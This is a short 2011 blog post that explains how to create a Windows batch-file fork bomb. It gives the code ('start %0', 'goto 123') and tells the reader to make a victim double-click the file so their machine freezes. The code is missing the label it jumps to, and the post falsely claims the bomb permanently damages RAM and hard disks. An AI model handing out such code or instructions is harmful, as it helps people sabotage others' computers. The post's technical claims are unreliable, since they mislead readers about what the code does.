Tuesday, 2 August 2011

Creating a Fork Bomb virus

Fork Bomb is a really dangerous virus that can cause serious system trouble, it can cause permanent RAM failure and hard disk damage. In addition to that, it is not possible to use the computer until system restart.

You will need
  1. Notepad
  2. Virus Code
How to Create
  • Open Notepad.
  • Paste the following code.
                       start %0
                       goto 123

  • Save the file as fork.bat (.bat extension is essential) and make the victim double click it on his computer.
  • The victim's screen will be flooded with command prompt windows and he will have to restart the computer by powering off and powering on again, since the system will freeze.
  • To delete the virus simply delete the fork.bat file.

Warning: Handle with care. Never use it on your own computer, I'm not responsible for any damage. You have been warned.

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